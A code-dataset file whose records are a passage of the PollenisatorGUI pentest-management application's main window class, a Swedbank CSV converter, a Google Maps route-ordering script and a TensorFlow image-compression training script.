fill=\"x\")\n self.photo = CTkImage(Image.open(utils.getHelpIconPath()))\n self.helpFrame = None\n self.btnHelp = CTkButton(filterbar_frame, text=\"\",image=self.photo, fg_color=\"transparent\", width=10, command=self.showSearchHelp)\n\n self.btnHelp.pack(side=\"left\")\n filterbar_frame.pack(side=tk.TOP,fill=tk.X)\n self.statusbar = StatusBar(searchFrame, self.statusbarClicked)\n self.statusbar.pack(side=tk.BOTTOM, fill=tk.X)\n searchFrame.pack(side=\"top\", fill=\"x\")\n #PANED PART\n self.paned = tk.PanedWindow(self.mainPageFrame, orient=\"horizontal\")\n #RIGHT PANE : Canvas + frame\n \n self.proxyFrameMain = CTkFrame(self.paned)\n self.proxyFrameMain.rowconfigure(0, weight=1) \n self.proxyFrameMain.columnconfigure(0, weight=1) \n self.viewframe = ScrollableFrameXPlateform(self.proxyFrameMain)\n \n \n #LEFT PANE : Treeview\n self.left_pane = CTkFrame(self.paned)\n self.frameTw = CTkFrame(self.left_pane)\n self.frameTw.rowconfigure(1, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.frameTw.columnconfigure(0, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.treevw = PentestTreeview(self, self.frameTw)\n frameContext = CTkFrame(self.frameTw)\n self.btn_context = CTkSegmentedButton(frameContext, values=[\"Hosts\", \"Checklist\"], width=200, height=45, command=self.checklistViewSwap)\n self.btn_context.set(\"Check\" if self.settings.is_checklist_view() else \"Hosts\")\n self.btn_context.pack(side=\"left\")\n frameContext.grid(row=0, column=0)\n self.treevw.initUI()\n self.scbVSel = CTkScrollbar(self.frameTw,\n orientation=tk.VERTICAL,\n command=self.treevw.yview)\n self.treevw.configure(yscrollcommand=self.scbVSel.set)\n self.treevw.grid(row=1, column=0, sticky=tk.NSEW)\n self.scbVSel.grid(row=1, column=1, sticky=tk.NS)\n # FILTER PANE:\n # self.filtersFrame = CTkFrame(self.left_pane)\n # self.initFiltersFrame(self.filtersFrame)\n # self.filtersFrame.pack(side=\"bottom\", fill=\"x\")\n # END PANE PREP\n self.frameTw.pack(side=\"top\", fill=tk.BOTH, expand=True)\n \n self.left_pane.pack(side=\"left\", fill=tk.BOTH, expand=True)\n self.paned.add(self.left_pane)\n self.proxyFrameMain.pack(side=\"right\", fill=tk.BOTH, expand=True)\n self.viewframe.pack(fill=tk.BOTH, expand=1)\n \n self.paned.add(self.proxyFrameMain)\n\n self.paned.pack(fill=tk.BOTH, expand=1)\n self.mainPageFrame.pack(fill=\"both\", expand=True)\n self.nbk.add(self.mainPageFrame, \"Main View\", order=Module.HIGH_PRIORITY, image=self.main_tab_img)\n \n self.nbk\n def searchbarSelectAll(self, _event=None):\n \"\"\"\n Callback to select all the text in searchbar\n Args:\n _event: not used but mandatory\n \"\"\"\n self.searchBar.select_range(0, 'end')\n self.searchBar.icursor('end')\n return \"break\"\n\n \n def checklistViewSwap(self, _event=None):\n is_checklist_view = \"Check\" in self.btn_context.get()\n settings = Settings()\n settings.local_settings[\"checklist_view\"] = is_checklist_view\n settings.saveLocalSettings()\n self.treevw.checklistViewSwap()\n\n\n def initCommandsView(self):\n \"\"\"Populate the command tab menu view frame with cool widgets\"\"\"\n self.commandsPageFrame = CTkFrame(self.topviewframe)\n self.commandPaned = tk.PanedWindow(self.commandsPageFrame, height=800)\n self.commandsFrameTw = CTkFrame(self.commandPaned)\n self.proxyFrameCommand = CTkFrame(self.commandPaned)\n self.commandsFrameTw.pack(expand=True)\n self.commandsViewFrame = ScrollableFrameXPlateform(self.proxyFrameCommand)\n self.commandsTreevw = CommandsTreeview(self, self.commandsFrameTw)\n scbVSel = CTkScrollbar(self.commandsFrameTw,\n orientation=tk.VERTICAL,\n command=self.commandsTreevw.yview)\n self.commandsTreevw.configure(yscrollcommand=scbVSel.set)\n self.commandsTreevw.grid(row=0, column=0, sticky=tk.NSEW)\n scbVSel.grid(row=0, column=1, sticky=tk.NS)\n self.commandPaned.add(self.commandsFrameTw)\n self.commandsViewFrame.pack(fill=tk.BOTH, expand=1)\n self.commandPaned.add(self.proxyFrameCommand)\n self.commandPaned.pack(fill=tk.BOTH, expand=1)\n self.commandsFrameTw.rowconfigure(0, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.commandsFrameTw.columnconfigure(0, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.nbk.add(self.commandsPageFrame, \"Commands\", order=Module.LOW_PRIORITY, image=self.commands_tab_img)\n\n\n def showSearchHelp(self, _event=None):\n \"\"\"Called when the searchbar help button is clicked. Display a floating help window with examples\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.helpFrame is None:\n x, y = self.btnHelp.winfo_rootx(), self.btnHelp.winfo_rooty()\n self.helpFrame = FloatingHelpWindow(410, 400, x-380, y+40, self)\n else:\n self.helpFrame.destroy()\n self.helpFrame = None\n\n def beforeTabSwitch(self, current, new):\n if current is None:\n return\n for module in self.modules:\n if current.strip().lower() == module[\"name\"].strip().lower():\n if hasattr(module[\"object\"], \"close\"):\n module[\"object\"].close()\n\n def tabSwitch(self, tabName):\n \"\"\"Called when the user click on the tab menu to switch tab. Add a behaviour before the tab switches.\n Args:\n tabName: the opened tab\n \"\"\"\n apiclient = APIClient.getInstance()\n self.searchBar.quit()\n if tabName == \"Main View\":\n self.refreshUI()\n if tabName == \"Commands\":\n self.commandsTreevw.initUI()\n if apiclient.getCurrentPentest() is None or apiclient.getCurrentPentest() == \"\":\n opened = self.openPentestsWindow()\n if opened is None:\n return\n if tabName == \"Scan\":\n if apiclient.getCurrentPentest() != \"\":\n self.scanManager.refreshUI()\n elif tabName == \"Settings\":\n self.settings.reloadUI()\n elif tabName == \"Admin\":\n self.admin.refreshUI()\n else:\n for module in self.modules:\n if tabName.strip().lower() == module[\"name\"].strip().lower():\n module[\"object\"].open()\n\n def initSettingsView(self):\n \"\"\"Add the settings view frame to the notebook widget and initialize its UI.\"\"\"\n self.settingViewFrame = CTkFrame(self.topviewframe)\n self.settings.initUI(self.settingViewFrame)\n self.nbk.add(self.settingViewFrame, \"Settings\", order=Module.LAST_PRIORITY, image=self.settings_tab_img)\n\n def initScanView(self):\n \"\"\"Add the scan view frame to the notebook widget. This does not initialize it as it needs a database to be opened.\"\"\"\n self.scanViewFrame = CTkFrame(self.topviewframe)\n self.scanManager.initUI(self.scanViewFrame)\n self.nbk.add(self.scanViewFrame, \"Scan\", order=Module.HIGH_PRIORITY, image=self.scan_tab_img)\n\n def initAdminView(self):\n \"\"\"Add the admin button to the notebook\"\"\"\n self.admin = AdminView(self.topviewframe)\n self.adminViewFrame = CTkFrame(self.topviewframe)\n self.admin.initUI(self.adminViewFrame)\n self.nbk.add(self.adminViewFrame, \"Admin\", order=Module.LOW_PRIORITY, image=self.admin_tab_img)\n\n def openScriptModule(self):\n \"\"\"Open the script window\"\"\"\n self.scriptManager = ScriptManager()\n self.scriptManager.initUI(self)\n self.wait_window(self.scriptManager.app)\n\n def initUI(self):\n \"\"\"\n initialize all the main windows objects. (Bar Menu, contextual menu, treeview, editing pane)\n \"\"\"\n if self.nbk is not None:\n self.refreshUI()\n return\n self.nbk = ButtonNotebook(self, self.tabSwitch, self.beforeTabSwitch)\n self.panedTerminals = ttk.PanedWindow(self.nbk, orient=\"vertical\")\n self.topviewframe = CTkFrame(self.panedTerminals)\n self.terminals = TerminalsWidget(self.panedTerminals, self, height=200)\n \n self.initMainView()\n self.initAdminView()\n self.initCommandsView()\n self.initScanView()\n self.initSettingsView()\n\n for module in self.modules:\n module[\"view\"] = CTkFrame(self.topviewframe)\n module[\"object\"].initUI(module[\"view\"], self.topviewframe, self.treevw, tkApp=self)\n for module in self.modules:\n self.nbk.add(module[\"view\"], module[\"name\"].strip(), order=module[\"object\"].__class__.order_priority, image=module[\"img\"])\n self.terminals.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=1)\n self.topviewframe.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.panedTerminals.add(self.topviewframe, weight=1)\n self.panedTerminals.add(self.terminals, weight=0)\n \n self.panedTerminals.pack(fill=tk.BOTH, expand=True)\n \n\n \n self._initMenuBar()\n self.nbk.pack(fill=tk.BOTH, expand=1)\n self.terminals.open_terminal()\n\n\n def refreshUI(self):\n for widget in self.viewframe.winfo_children():\n widget.destroy()\n \n self.left_pane.update()\n self.after(50, lambda: self.paned.paneconfigure(self.left_pane, height=self.left_pane.winfo_reqheight()))\n self.treevw.refresh()\n self.treevw.filter_empty_nodes()\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n # self.nbk.select(\"Main View\")\n\n def open_terminal(self, iid, title):\n self.terminals.open_terminal(iid, title)\n\n def execute_in_terminal(self, title, commandline):\n iid = uuid.uuid4()\n self.terminals.open_terminal(iid, title, enable_trap=False)\n self.terminals.launch_in_terminal(iid, commandline, use_pollex=False)\n\n def launch_in_terminal(self, iid, title, commandline, use_pollex=True):\n if iid is None:\n iid = uuid.uuid4()\n self.terminals.open_terminal(iid, title, enable_trap=use_pollex)\n self.terminals.launch_in_terminal(iid, commandline, use_pollex=use_pollex)\n return iid\n\n def launch_tool_in_terminal(self, tool_model, command):\n self.terminals.open_terminal(str(tool_model.check_iid)+\"|\"+str(tool_model.getId()), ToolController(tool_model).getDetailedString())\n self.terminals.launch_in_terminal(str(tool_model.check_iid)+\"|\"+str(tool_model.getId()), command)\n\n def open_ro_terminal(self, check_iid, title, tool_controller, scanManager):\n self.terminals.open_ro_terminal(check_iid, title, tool_controller, scanManager)\n\n def open_any_terminal(self, iid, title, tool_controller, scanManager):\n self.terminals.open_any_terminal(iid, title, tool_controller, scanManager)\n \n def quickSearchChanged(self, event=None):\n \"\"\"Called when the quick search bar is modified. Change settings\n Args:\n event: not used but mandatory\n \"\"\"\n self.settings.local_settings[\"quicksearch\"] = int(self.quickSearchVal.get())\n self.settings.saveLocalSettings()\n\n def keepParentsChanged(self, event=None):\n \"\"\"Called when the keep parent switch is modified. Change settings\n Args:\n event: not used but mandatory\n \"\"\"\n self.settings.local_settings[\"keep_parents\"] = int(self.keep_parents_val.get())\n self.settings.saveLocalSettings()\n \n def newSearch(self, _event=None, histo=True, quick_search_allowed=True):\n \"\"\"Called when the searchbar is validated (click on search button or enter key pressed).\n Perform a filter on the main treeview.\n Args:\n _event: not used but mandatory\"\"\"\n filterStr = self.searchBar.get()\n if filterStr.strip() == \"\":\n self.resetButtonClicked()\n return\n self.settings.reloadSettings()\n success = self.treevw.filterTreeview(filterStr, self.settings, quick_search_allowed)\n self.searchMode = (success and filterStr.strip() != \"\")\n if success:\n if histo:\n histo_filters = self.settings.local_settings.get(\"histo_filters\", [])\n if filterStr.strip() != \"\":\n histo_filters.insert(0, filterStr)\n if len(histo_filters) > 10:\n histo_filters = histo_filters[:10]\n self.settings.local_settings[\"histo_filters\"] = histo_filters\n self.settings.saveLocalSettings()\n if self.helpFrame is not None:\n self.helpFrame.destroy()\n self.helpFrame = None\n\n def statusbarClicked(self, name):\n \"\"\"Called when a button in the statusbar tag is clicked.\n filter the treeview to match the status bar tag clicked and enforce select of main view\n Args:\n name: not used but mandatory\"\"\"\n # get the index of the mouse click\n datamanager = DataManager.getInstance()\n taggeds = datamanager.get(\"tags\", \"*\")\n tagged_items = []\n tagged_types = set()\n for tagged in taggeds.values():\n for tag in tagged.tags:\n if not isinstance(tag, str):\n tag = tag[0]\n if tag == name:\n tagged_items.append(tagged)\n tagged_types.add(tagged.item_type)\n for module in self.modules:\n for tagged_type in tagged_types:\n if tagged_type.lower() in getattr(module[\"object\"], \"classes\", []):\n if hasattr(module[\"object\"], \"statusbarClicked\"):\n self.nbk.select(module[\"name\"].strip())\n module[\"object\"].statusbarClicked(name)\n return\n # default \n self.nbk.select(\"Main View\")\n self.search(\"\\\"\"+name+\"\\\" in tags\")\n\n def modelToView(self, collection, model):\n \"\"\"Return the view of a model\"\"\"\n for module in self.modules:\n if collection.lower() == getattr(module[\"object\"], \"coll_name\", \"\").lower() or collection.lower() in getattr(module[\"object\"], \"classes\", \"\"):\n return module[\"object\"].modelToView(collection, model)\n return self.treevw.modelToView(collection, model)\n \n def search(self, filter_str):\n self.nbk.select(\"Main View\")\n self.searchMode = True\n self.searchBar.delete(0, tk.END)\n self.searchBar.insert(tk.END, filter_str)\n self.newSearch(histo=False, quick_search_allowed=False)\n\n def resetButtonClicked(self):\n \"\"\"\n Called when the reset button of the status bar is clicked.\n \"\"\"\n self.searchMode = False\n self.searchBar.reset()\n self.treevw.unfilterAll()\n\n def refreshView(self, _event=None):\n \"\"\"\n Reload the currently opened tab\n Args:\n _event: not used but mandatory\n \"\"\"\n setViewOn = None\n nbkOpenedTab = self.nbk.getOpenTabName()\n activeTw = None\n if nbkOpenedTab == \"Main View\":\n activeTw = self.treevw\n elif nbkOpenedTab == \"Commands\":\n activeTw = self.commandsTreevw\n elif nbkOpenedTab == \"Scan\":\n self.scanManager.initUI(self.scanViewFrame)\n elif nbkOpenedTab == \"Settings\":\n self.settings.reloadUI()\n else:\n for module in self.modules:\n if nbkOpenedTab.strip().lower() == module[\"name\"].strip().lower():\n module[\"object\"].open()\n if activeTw is not None:\n if len(activeTw.selection()) == 1:\n setViewOn = activeTw.selection()[0]\n activeTw.refresh(force=True)\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n\n activeTw.filter_empty_nodes()\n if setViewOn is not None:\n try:\n activeTw.see(setViewOn)\n activeTw.focus(setViewOn)\n activeTw.selection_set(setViewOn)\n activeTw.openModifyWindowOf(setViewOn)\n except tk.TclError:\n pass\n\n def resetUnfinishedTools(self):\n \"\"\"\n Reset all running tools to a ready state.\n \"\"\"\n apiclient = APIClient.getInstance()\n if apiclient.getCurrentPentest() != \"\":\n utils.resetUnfinishedTools()\n self.treevw.load()\n\n def wrapperTestLocalTools(self):\n results = self.testLocalTools()\n dialog = ChildDialogToolsInstalled(results)\n dialog.wait_window()\n if dialog.rvalue is not None:\n self.settings.local_settings[\"my_commands\"] = dialog.rvalue\n self.settings.saveLocalSettings()\n\n def testLocalTools(self):\n \"\"\" test local binary path with which\"\"\"\n apiclient = APIClient.getInstance()\n self.settings.reloadLocalSettings()\n plugins = apiclient.getPlugins()\n results = {\"successes\":[], \"failures\":[]}\n for plugin in plugins:\n if plugin[\"plugin\"] == \"Default\":\n continue\n bin_path = self.settings.local_settings.get(\"my_commands\", {}).get(plugin[\"plugin\"])\n if bin_path is None or bin_path == \"\" or utils.which_expand_alias(bin_path):\n default_bin_names = plugin[\"default_bin_names\"]\n found_matching = False\n for default_bin_name in default_bin_names:\n if utils.which_expand_alias(default_bin_name):\n plugin[\"bin_path\"] = default_bin_name\n bin_path = default_bin_name\n results[\"successes\"].append({\"title\":\"Success\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is valid. ({bin_path}).\"})\n found_matching = True\n break\n if found_matching == False:\n results[\"failures\"].append({\"title\":\"Invalid binary path\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is not recognized. ({bin_path}).\"})\n else:\n results[\"successes\"].append({\"title\":\"Success\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is valid. ({bin_path}).\"})\n return results\n \n\n def exportCommands(self):\n \"\"\"\n Dump pollenisator from database to an archive file gunzip.\n \"\"\"\n dialog = ChildDialogQuestion(self, \"Ask question\", \"Do you want to export your commands or Worker's commands.\", [\"My commands\", \"Worker\"])\n self.wait_window(dialog.app)\n apiclient = APIClient.getInstance()\n res, msg = apiclient.exportCommands(self)\n if res:\n tkinter.messagebox.showinfo(\n \"Export pollenisator database\", \"Export completed in \"+str(msg))\n else:\n tkinter.messagebox.showinfo(msg)\n \n def exportCheatsheet(self):\n \"\"\"\n Dump pollenisator from database to an archive file gunzip.\n \"\"\"\n apiclient = APIClient.getInstance()\n res, msg = apiclient.exportCheatsheet(self)\n if res:\n tkinter.messagebox.showinfo(\n \"Export cheatsheet database\", \"Export completed in \"+str(msg))\n else:\n tkinter.messagebox.showinfo(msg)\n\n \n\n def findUnscannedPorts(self):\n ports = Port.fetchObjects({})\n datamanager = DataManager.getInstance()\n for port in ports:\n port_key = port.getDbKey()\n res = datamanager.find(\"tools\", port_key, multi=False)\n if res is None:\n port.setTags([\"unscanned\"])\n\n def importCommands(self, name=None):\n \"\"\"\n Import a pollenisator archive file gunzip to database.\n Args:\n name: The filename of the gunzip command table exported previously\n Returns:\n None if name is None and filedialog is closed\n True if commands successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(parent=self, defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n dialog = ChildDialogQuestion(self, \"Ask question\", \"Do you want to import these commands for you or the worker.\", [\"Me\", \"Worker\"])\n self.wait_window(dialog.app)\n apiclient = APIClient.getInstance()\n success = apiclient.importCommands(filename, forWorker=dialog.rvalue == \"Worker\")\n self.commandsTreevw.refresh()\n except IOError:\n tkinter.messagebox.showerror(\n \"Import commands\", \"Import failed. \"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n tkinter.messagebox.showerror(\"Command import\", \"Command import failed\")\n else:\n tkinter.messagebox.showinfo(\"Command import\", \"Command import completed\")\n return success\n\n def importCheatsheet(self, name=None):\n \"\"\"\n Import a pollenisator cheatsheet file json to database.\n Args:\n name: The filename of the json command table exported previously\n Returns:\n None if name is None and filedialog is closed\n True if commands successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(parent=self, defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n apiclient = APIClient.getInstance()\n success = apiclient.importCheatsheet(filename)\n except IOError:\n tkinter.messagebox.showerror(\n \"Import Cheatsheet\", \"Import failed. \"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n tkinter.messagebox.showerror(\"Cheatsheet import\", \"Cheatsheet import failed\")\n else:\n tkinter.messagebox.showinfo(\"Cheatsheet import\", \"Cheatsheet import completed\")\n return success\n\n def importDefectTemplates(self, name=None):\n \"\"\"\n Import defect templates from a json\n Args:\n name: The filename of the json containing defect templates\n Returns:\n None if name is None and filedialog is closed\n True if defects successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n apiclient = APIClient.getInstance()\n success = apiclient.importDefectTemplates(filename)\n except IOError:\n tkinter.messagebox.showerror(\n \"Import defects templates\", \"Import failed. \"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n tkinter.messagebox.showerror(\"Defects templates import\", \"Defects templatest failed\")\n else:\n tkinter.messagebox.showinfo(\"Defects templates import\", \"Defects templates completed\")\n return success\n\n def openPentestsWindow(self, _event=None, pentests=None):\n \"\"\"\n Open Pentest dialog window\n Args:\n _event: Not used but mandatory\n Returns:\n None if no database were selected\n datababase name otherwise\n \"\"\"\n dialog = ChildDialogPentests(self, pentests)\n try:\n dialog.wait_window(dialog)\n except tk.TclError:\n pass\n if dialog.rvalue is not None:\n self.openPentest(dialog.rvalue)\n return dialog.rvalue\n\n\n def newPentest(self, pentestName, pentest_type, start_date, end_date, scope, settings, pentesters):\n \"\"\"\n Register the given pentest name into database and opens it.\n\n Args:\n pentestName: The pentest database name to register in database.\n \"\"\"\n succeed = False\n if pentestName is not None:\n apiclient = APIClient.getInstance()\n succeed, msg = apiclient.registerPentest(pentestName, pentest_type, start_date, end_date, scope, settings, pentesters)\n if not succeed:\n tkinter.messagebox.showinfo(\"Forbidden\", msg)\n return succeed\n\n def closePentest(self):\n \"\"\"\n Close the current pentest and refresh the treeview.\n \"\"\"\n apiclient = APIClient.getInstance()\n apiclient.dettach(self)\n if self.terminals is not None:\n self.terminals.onClosing()\n \n if self.scanManager is not None:\n self.scanManager.onClosing()\n \n \n for module in self.modules:\n if callable(getattr(module[\"object\"], \"onClosing\", None)):\n module[\"object\"].onClosing()\n\n def openPentest(self, filename=\"\"):\n \"\"\"\n Open the given database name. Loads it in treeview.\n\n Args:\n filename: the pentest database name to load in application. If \"\" is given (default), will refresh the already opened database if there is one.\n \"\"\"\n pentestName = None\n apiclient = APIClient.getInstance()\n\n if filename == \"\" and apiclient.getCurrentPentest() != \"\":\n pentestName = apiclient.getCurrentPentest()\n elif filename != \"\":\n pentestName = filename.split(\".\")[0].split(\"/\")[-1]\n if pentestName is not None:\n self.closePentest()\n first_use_detected = self.detectFirstUse()\n res = apiclient.setCurrentPentest(pentestName, first_use_detected)\n if not res:\n tk.messagebox.showerror(\"Connection failed\", \"Could not connect to \"+str(pentestName))\n return\n DataManager.getInstance().load()\n self.initUI()\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n self.sio.emit(\"registerForNotifications\", {\"token\":apiclient.getToken(), \"pentest\":pentestName})\n self.settings.reloadSettings()\n self.refresh_tabs()\n self.nbk.select(\"Dashboard\")\n\n def refresh_tabs(self):\n apiclient = APIClient.getInstance()\n if apiclient.isAdmin():\n self.nbk.add(self.adminViewFrame, \"Admin\", order=Module.LAST_PRIORITY, image=self.admin_tab_img)\n else:\n self.nbk.delete(\"Admin\")\n pentest_type = self.settings.getPentestType()\n for module in self.modules:\n pentest_type_allowed = pentest_type.lower() in module[\"object\"].__class__.pentest_types\n all_are_authorized = \"all\" in module[\"object\"].__class__.pentest_types\n module_need_admin = module[\"object\"].__class__.need_admin\n is_admin = apiclient.isAdmin()\n if (pentest_type_allowed or all_are_authorized) and (is_admin or not module_need_admin):\n self.nbk.add(module[\"view\"], module[\"name\"].strip(), order=module[\"object\"].__class__.order_priority, image=module[\"img\"])\n else: \n self.nbk.delete(module[\"name\"])\n\n \n def importExistingTools(self, _event=None):\n \"\"\"\n Ask user to import existing files to import.\n \"\"\"\n dialog = ChildDialogFileParser(self)\n self.wait_window(dialog.app)\n\n def detectFirstUse(self):\n detector = os.path.join(utils.getConfigFolder(),\".first_use\")\n if os.path.exists(detector):\n return False\n with open(detector, mode=\"w\") as f:\n f.write(\"\")\n return True\n","repo_name":"fbarre96/PollenisatorGUI","sub_path":"pollenisatorgui/core/application/appli.py","file_name":"appli.py","file_ext":"py","file_size_in_byte":59578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8689513657","text":"import csv\n\nimport arrow\n\nfrom .cmd import in_file, ledger, out_file, write_csv\n\n\ndef transform_row(row):\n date = arrow.get(row[5], \"YYYY-MM-DD\")\n date = date.format(\"YYYY-MM-DD\")\n value = row[-2]\n description = row[8]\n return [date, description, value]\n\n\n@ledger.command()\n@in_file(encoding=\"ISO-8859-1\")\n@out_file(\"/tmp/swedbank-to-reckon.csv\")\ndef swedbank_to_reckon(file, outfile):\n \"\"\"\n Converts Swedbank csv output so that it's parsable by cantino/reckon.\n \"\"\"\n reader = csv.reader(file)\n # Skip date header\n next(reader)\n # Skip date header\n next(reader)\n write_csv(reader, outfile, transform_row)\n","repo_name":"danihodovic/dht","sub_path":"src/ledger/swedbank.py","file_name":"swedbank.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12110262966","text":"import googlemaps\nfrom datetime import datetime\nimport itertools\n\nlista_end = []\nseletor = 0\nmatriz_dist_temp = []\ninicial = 0\nselect_inicial = 0\n\ndef menu_inicial():\n seletor = input(\"\\n \\n Selecione a opção: \\n \\n a -> Adicionar endereços, lembrando que o primeiro sera o ponto de inicio \\n b -> Calcular melhor rota \\n \")\n if seletor == \"a\":\n add_end = input(\"Digite o endereço:\")\n lista_end.append (add_end)\n print (lista_end)\n menu_inicial()\n\n if seletor == \"a\":\n api_dist()\n \ndef api_dist():\n\n for x,y in itertools.combinations(lista_end, 2):\n end_1 = x\n end_2 = y\n\n api_key = 'ADICIONE A KEY AQUI'\n\n client = googlemaps.Client(api_key)\n\n origin = end_1\n destination = end_2\n\n now = datetime.now()\n\n directions_result = client.directions(origin, destination, mode=\"driving\", departure_time=now)\n\n distance = directions_result[0]['legs'][0]['distance']['value']\n duration = directions_result[0]['legs'][0]['duration']['text']\n\n steps = directions_result[0]['legs'][0]['steps']\n\n print (f\"A distancia entre {origin} e {destination} é {distance}\")\n\n dist = (origin, destination, distance)\n \n matriz_dist_temp.append (dist)\n \n\n # Print the steps of the route\n # print(\"The steps for the route are:\")\n # for step in steps:\n # print (step['html_instructions'])\n\ndef get_google_maps_url(visited2):\n base_url = \"https://www.google.com/maps/dir/\"\n\n endq = ''.join(map(str, visited2))\n\n google_maps_url = base_url + endq\n\n return google_maps_url\n\ndef main():\n menu_inicial() \n print (matriz_dist_temp)\n lst= matriz_dist_temp\n\n result = {}\n for item in lst:\n src, dest, weight = item\n if src not in result:\n result[src] = {}\n if dest not in result:\n result[dest] = {}\n result[src][dest] = weight\n result[dest][src] = weight if dest in result[src] else 0\n \n for node in result:\n result[node] = {k: v for k, v in result[node].items() if v != 0}\n print (result)\n\n\n nodes = lista_end\n distances = result\n\n unvisited = {node: None for node in nodes} \n visited = {}\n visited_list_2 = []\n current = lista_end[0]\n currentDistance = 0\n unvisited[current] = currentDistance\n\n while True:\n for neighbour, distance in distances[current].items():\n if neighbour not in unvisited: continue\n newDistance = currentDistance + distance\n if unvisited[neighbour] is None or unvisited[neighbour] > newDistance:\n unvisited[neighbour] = newDistance\n visited[current] = currentDistance\n del unvisited[current]\n if not unvisited: break\n candidates = [node for node in unvisited.items() if node[1]]\n current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]\n\n print(\"visited\", visited)\n items_str = ', '.join(visited)\n\n print(\"items_str\", items_str)\n\n \n ##Lista da rota em string \n items_str = ', '.join(visited)\n\n ##tira a distancia de visited \n visited_list = [item.strip() for item in items_str.split(',')]\n\n print(\"visited_list\", visited_list)\n \n\n print(\"O número de itens em visited_list é:\", len(visited_list))\n \n for item in visited_list:\n visited_list_2.append(item.replace(\" \", \"+\"))\n print(visited_list_2)\n \n\n\n maps_url = get_google_maps_url('/'.join(visited_list_2))\n\n print(\"Google Maps URL:\", maps_url)\n exit()\n\n\nmain()\n","repo_name":"JuCastro01/Projeto-grafos-alg-dijkstra","sub_path":"app-enderecos.py","file_name":"app-enderecos.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38679000282","text":"\"\"\"\ntrain a simple compression model\n\"\"\"\nfrom datetime import datetime\nimport time\n\nimport tensorflow as tf\nimport sg_model\n#pylint: disable=W0201\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_dir', 'compress_train_log/',\n \"\"\"Directory where to write event logs and checkpoint\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 1,\n \"\"\"Number of batches to run.\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False,\n \"\"\"Whethre to log device placement.\"\"\")\n\ndef train():\n \"\"\"train my simple compress model.\"\"\"\n with tf.Graph().as_default():\n #global_step for learning-rate decay\n global_step = tf.Variable(0, name='global_step', trainable=False)\n #global_step = tf.Variable(0, trainable=False, name='global_step')\n #global_step should be a tensor with name 'global_step')\n #get images from input\n images, labels = sg_model.inputs(eval_data=False, batch_size=FLAGS.batch_size)\n #inference model\n resi_images = sg_model.inference(images)\n #calculate loss\n loss_l1 = sg_model.loss(resi_images)\n #learning decay\n starter_learning_rate = 0.1\n learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,\n 150000, 0.1, staircase=True)\n #train op, back propagation\n train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_l1,\n global_step=global_step)\n init = tf.initialize_all_variables()\n init_local = tf.initialize_local_variables()\n class _LoggerHook(tf.train.SessionRunHook):\n \"\"\"logs loss and runtime\"\"\"\n def begin(self):\n self._step = -3#there is two step for initialize\n\n def before_run(self, run_context):\n self._step += 1\n self._start_time = time.time()\n return tf.train.SessionRunArgs(loss_l1)\n\n def after_run(self, run_context, run_values):\n duration = time.time() - self._start_time\n loss_value = run_values.results\n if self._step % 10 == 0:\n num_examples_per_step = FLAGS.batch_size\n examples_per_sec = num_examples_per_step / duration\n sec_per_batch = float(duration)\n\n format_str = ('%s: step %d, loss_l1 = %.2f (%.1f examples/sec; %.3f'\n 'sec/batch)')\n print (format_str % (datetime.now(), self._step, loss_value,\n examples_per_sec, sec_per_batch))\n with tf.train.MonitoredTrainingSession(checkpoint_dir=FLAGS.train_dir,\n hooks=[tf.train.StopAtStepHook(\n last_step=FLAGS.max_steps),\n tf.train.NanTensorHook(loss_l1),\n _LoggerHook()],\n config=tf.ConfigProto(\n log_device_placement=\n FLAGS.log_device_placement)) as mon_sess:\n summary_writer = tf.summary.FileWriter('./log', mon_sess.graph)\n mon_sess.run(init)\n mon_sess.run(init_local)\n while not mon_sess.should_stop():\n mon_sess.run(train_op)\n summary_writer.close()\n\ndef main(argv=None):\n \"\"\"\n tensorflow main function\n \"\"\"\n train()\n\nif __name__ == '__main__':\n \"\"\"\n main func\n \"\"\"\n 